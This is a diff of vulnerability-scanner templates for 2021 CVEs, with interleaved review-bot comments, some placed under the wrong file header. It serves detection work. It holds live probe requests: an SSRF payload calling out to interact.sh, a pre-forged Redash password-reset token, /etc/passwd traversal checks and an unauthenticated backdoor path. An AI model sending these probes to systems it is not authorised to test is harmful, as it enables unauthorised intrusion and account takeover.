AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://{{interactsh-url}}/' + - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://interact.sh/' redirects: true max-redirects: 2 matchers: - type: word - part: interactsh_protocol words: - - "http" # Confirms HTTP Interaction \ No newline at end of file + - "Interactsh Server" + + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index bf8c66917d..685aa50014 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml 
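Review bot: The new path sends the proxied request to the fixed public host `http://interact.sh/` and the matcher now looks for the literal text `Interactsh Server` with no `part`, replacing the `{{interactsh-url}}` target and the `interactsh_protocol` check. As I read it, a positive result now depends on the target being able to reach that one third-party host and on its landing-page text staying as it is today, and the scan no longer produces an out-of-band interaction attributed to it (the `oast` tag was dropped accordingly). The `{{repeat("A", 7701)}}` helper is a welcome replacement for the inline padding, but I would keep `|http://{{interactsh-url}}/` with `part: interactsh_protocol` and `words: - "http"` as the primary matcher; if the fixed host is kept as a fallback, give that matcher `part: body` explicitly.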
@@ -1,22 +1,22 @@ id: CVE-2021-40539 info: - name: ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution author: daffainfo,pdteam severity: critical - description: ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass which leads to remote code execution. - remediation: Upgrade to ADSelfService Plus build 6114. + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 - https://github.com/synacktiv/CVE-2021-40539 - tags: cve,cve2021,rce,ad,intrusive + - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 + remediation: Upgrade to ADSelfService Plus build 6114. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-287 + tags: cve,cve2021,rce,ad,intrusive,manageengine requests: @@ -112,3 +112,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/18 diff --git a/cves/2021/CVE-2021-40542.yaml b/cves/2021/CVE-2021-40542.yaml index ca8d260c4f..247ec475a8 100644 --- a/cves/2021/CVE-2021-40542.yaml +++ b/cves/2021/CVE-2021-40542.yaml 
@@ -1,17 +1,18 @@
 id: CVE-2021-40542
 info:
- name: Opensis-Classic 8.0 Reflected XSS
+ name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting
 author: alph4byt3
 severity: medium
- description: Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
+ description: |
+ Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
 reference:
 - https://github.com/OS4ED/openSIS-Classic/issues/189
 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2021-38704
+ cvss-score: 6.1
+ cve-id: CVE-2021-40542
 cwe-id: CWE-79
 tags: xss,cve,cve2021,opensis
@@ -35,3 +36,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/03/18
diff --git a/cves/2021/CVE-2021-40822.yaml
new file mode 100644
index 0000000000..e9f58064ff
--- /dev/null
+++ b/cves/2021/CVE-2021-40822.yaml
@@ -0,0 +1,45 @@ +id: CVE-2021-40822 + +info: + name: Geoserver - SSRF + author: For3stCo1d + severity: high + description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host. + reference: + - https://gccybermonks.com/posts/cve-2021-40822/ + - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40822 + - https://github.com/geoserver/geoserver/releases + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40822 + cwe-id: CWE-918 + metadata: + fofa-query: app="GeoServer" + verified: "true" + tags: cve2021,ssrf,geoserver,cve + +requests: + - raw: + - | + POST /geoserver/TestWfsPost HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + words: + - "" + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-40856.yaml b/cves/2021/CVE-2021-40856.yaml index ab8b50aadd..3499f2bcd8 100644 --- a/cves/2021/CVE-2021-40856.yaml +++ b/cves/2021/CVE-2021-40856.yaml 
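Review bot: Under `matchers-condition: and`, the second word matcher's only entry is the empty string `""` as rendered here; if the file really contains an empty word rather than markup lost in this listing, that matcher is satisfied by every response and adds nothing while looking like a check. Put the expected response fragment in `words`, or drop that matcher and rely on `interactsh_protocol` plus the 200 status. `verified: "true"` under `metadata` is a quoted string rather than a boolean; nuclei treats metadata as free-form, so this is cosmetic, but the bare form is easier to filter on.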
@@ -3,12 +3,19 @@ id: CVE-2021-40856 info: name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass author: gy741 - severity: medium - description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + severity: high + description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-40856 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 - tags: cve,cve2021,comfortel,auth-bypass + - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses + - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40856 + cwe-id: CWE-287 + tags: cve,cve2021,comfortel,auth-bypass,auerswald requests: - raw: @@ -35,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-40859.yaml b/cves/2021/CVE-2021-40859.yaml new file mode 100644 index 0000000000..6a3d2f6cf0 --- /dev/null +++ b/cves/2021/CVE-2021-40859.yaml 
@@ -0,0 +1,45 @@
+id: CVE-2021-40859
+
+info:
+ name: Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor
+ author: pussycat0x
+ severity: critical
+ description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.
+ reference:
+ - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-40859
+ - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
+ - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-40859
+ metadata:
+ fofa-dork: '"auerswald"'
+ tags: cve,cve2021,iot,unauth,voip,auerswald
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/about_state"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"pbx"'
+ - '"dongleStatus":0'
+ - '"macaddr"'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/16
diff --git a/cves/2021/CVE-2021-40868.yaml
index c688da0f0f..38c1061e72 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
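Review bot: The body matcher requires `'"dongleStatus":0'` under `condition: and`, so a device whose `/about_state` reports any other dongle status will not match even though the same unauthenticated endpoint is exposed; the key name, not its current value, is what identifies the endpoint. Change that entry to `- '"dongleStatus"'` and keep `"pbx"`, `"macaddr"`, the JSON content-type and the 200 status as they are. The description's defanged `192.168.1[.]2` example is harmless but unnecessary for a private address and could simply name the `/about_state` path.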
@@ -1,19 +1,22 @@ id: CVE-2021-40868 info: - name: Cloudron 6.2 Cross Site Scripting + name: Cloudron 6.2 Cross-Site Scripting author: daffainfo severity: medium - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - tags: cve,cve2021,xss,cloudron + - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html + - https://www.cloudron.io/ + remediation: Upgrade to Cloudron 6.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 + tags: cve,cve2021,xss,cloudron requests: - method: GET @@ -35,3 +38,5 @@ requests: words: - '' part: body + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml index a7237d6d7c..4bbb200201 100644 --- a/cves/2021/CVE-2021-40870.yaml +++ b/cves/2021/CVE-2021-40870.yaml 
@@ -1,19 +1,20 @@ id: CVE-2021-40870 info: - name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE + name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution author: pikpikcu severity: critical - description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. + description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. reference: + - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 - tags: cve,cve2021,rce,aviatrix classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-434 + tags: cve,cve2021,rce,aviatrix requests: - raw: @@ -41,3 +42,5 @@ requests: - "PHP Extension" - "PHP Version" condition: and + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml index 4144e75270..cc9e633024 100644 --- a/cves/2021/CVE-2021-40875.yaml +++ b/cves/2021/CVE-2021-40875.yaml 
@@ -1,20 +1,23 @@ id: CVE-2021-40875 info: - name: Gurock TestRail Application files.md5 exposure + name: Gurock TestRail Application files.md5 Exposure author: oscarintherocks - severity: medium - description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. - tags: cve,cve2021,exposure,gurock,testrail + severity: high + description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. reference: - https://github.com/SakuraSamuraii/derailed - https://johnjhacking.com/blog/cve-2021-40875/ - https://www.gurock.com/testrail/tour/enterprise-edition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + - htttps://github.com/SakuraSamuraii/derailed + - https://johnjhacking.com/blog/cve-2021-40875/ + - https://www.gurock.com/testrail/tour/enterprise-edition + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-40875 + cwe-id: CWE-863 metadata: shodan-query: https://www.shodan.io/search?query=TestRail + tags: cve,cve2021,exposure,gurock,testrail requests: - method: GET @@ -34,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 
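Review bot: The first added reference is `htttps://github.com/SakuraSamuraii/derailed` — three t's — and will not resolve; it should be `https://github.com/SakuraSamuraii/derailed`. As rendered here the four URLs directly above the added ones cannot be told apart from unchanged context, and the hunk's line counts (20 to 23) suggest they are removals; if they do survive as context, the reference list is now duplicated and the old entries should be dropped. The added `cwe-id: CWE-863` and the 7.5 vector are consistent with the severity change to `high` and the description.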
diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml index cca0c1c98f..f33d6c71e4 100644 --- a/cves/2021/CVE-2021-40960.yaml +++ b/cves/2021/CVE-2021-40960.yaml @@ -1,19 +1,20 @@ id: CVE-2021-40960 info: - name: Galera WebTemplate 1.0 – Directory Traversal + name: Galera WebTemplate 1.0 Directory Traversal author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 - tags: cve,cve2021,lfi + - http://www.galera.com.tr/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40960 cwe-id: CWE-22 + tags: cve,cve2021,lfi requests: - method: GET @@ -25,8 +26,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 81ec5d959e..34a4663e8d 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml 
@@ -1,19 +1,20 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: MKdocs 1.2.2 - Directory Traversal author: pikpikcu severity: high + description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. reference: + - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 - tags: cve,cve2021,mkdocs,lfi - description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 + tags: cve,cve2021,mkdocs,lfi requests: - method: GET @@ -31,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml index 241b7b0b94..348eadf47e 100644 --- a/cves/2021/CVE-2021-41174.yaml +++ b/cves/2021/CVE-2021-41174.yaml 
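Review bot: The new `description:` says the vendor has disputed the vulnerability "(see references)", but the only link that documented the dispute, `https://github.com/mkdocs/mkdocs/issues/2601` from the removed description, is not in the new `reference:` list; the added `pull/2604` is the fix, not the dispute. Either add the issue link back or drop the "(see references)" pointer so the claim stays verifiable. The new `name:` spells the project `MKdocs` while the project itself writes `MkDocs`, and it no longer conveys that only the built-in dev server is affected, which the description still states.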
@@ -1,21 +1,24 @@ id: CVE-2021-41174 info: - name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - tags: cve,cve2021,grafana,xss - metadata: - shodan-query: title:"Grafana" + - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 + - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 + remediation: Upgrade to 8.2.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 + metadata: + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,xss requests: - method: GET @@ -43,4 +46,6 @@ requests: - type: regex group: 1 regex: - - '"subTitle":"Grafana ([a-z0-9.]+)' \ No newline at end of file + - '"subTitle":"Grafana ([a-z0-9.]+)' + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41192.yaml b/cves/2021/CVE-2021-41192.yaml new file mode 100644 index 0000000000..dba2a044ba --- /dev/null +++ b/cves/2021/CVE-2021-41192.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2021-41192
+
+info:
+ name: Redash Setup Configuration - Default Secrets Disclosure
+ author: bananabr
+ severity: medium
+ description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
+ reference:
+ - https://hackerone.com/reports/1380121
+ - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41192
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2021-41192
+ cwe-id: CWE-1188
+ metadata:
+ shodan-query: http.favicon.hash:698624197
+ tags: cve,cve2021,redash,auth-bypass
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
+ - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Enter your new password:"
+ - "redash"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/23
diff --git a/cves/2021/CVE-2021-41266.yaml b/cves/2021/CVE-2021-41266.yaml
index 37b62119d8..5aed4ef4ea 100644
--- a/cves/2021/CVE-2021-41266.yaml
+++ b/cves/2021/CVE-2021-41266.yaml
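Review bot: Both probe paths carry one fixed, pre-signed password-reset token (`IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs`) and nothing in the template records where it comes from or whether it expires; if the token is time-limited the template will start returning false negatives silently while still looking healthy. Add a comment above `path:` stating that the token is the one derived from the documented default `REDASH_SECRET_KEY` and whether it is time-limited, and consider a `verified` metadata entry as `CVE-2022-23808.yaml` in this commit does. The description's `versions <=10.0 and prior` is tautological; `versions 10.0 and prior` reads cleanly.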
@@ -5,17 +5,20 @@ info: author: alevsk severity: critical description: | - Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token. + MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - tags: cve,cve2021,minio classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-41266 cwe-id: CWE-306 + remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside + the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes + service account token.' + tags: cve,cve2021,minio requests: - raw: 
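Review bot: The rewritten `description:` keeps the doubled word from the old line, `for the for MinIO Operator`, and the new `remediation:` carries the grammar slip `by unset the` plus the version spelling `v.0.12.3` that the description itself renders as `0.12.3`; suggested: `MinIO Console is a graphical user interface for the MinIO Operator.` and `Update to v0.12.3 or higher.`. The single quotes around the remediation are needed because of the embedded `automountServiceAccountToken: false`, but the string is split across three physical lines inside the quotes, so a `>-` folded block scalar would carry the same value more readably. Note also that `remediation:` is placed after `classification:` here but before it in `CVE-2021-41277.yaml` in this same commit; pick one position.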
@@ -43,4 +46,6 @@ requests: - type: word part: header words: - - "token" \ No newline at end of file + - "token" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml index d47d490eac..b2dd58b649 100644 --- a/cves/2021/CVE-2021-41277.yaml +++ b/cves/2021/CVE-2021-41277.yaml 
@@ -3,20 +3,22 @@ id: CVE-2021-41277 info: name: Metabase Local File Inclusion author: 0x_Akoko - severity: critical - description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. + severity: high + description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://nvd.nist.gov/vuln/detail/CVE-2021-41277 - https://twitter.com/90security/status/1461923313819832324 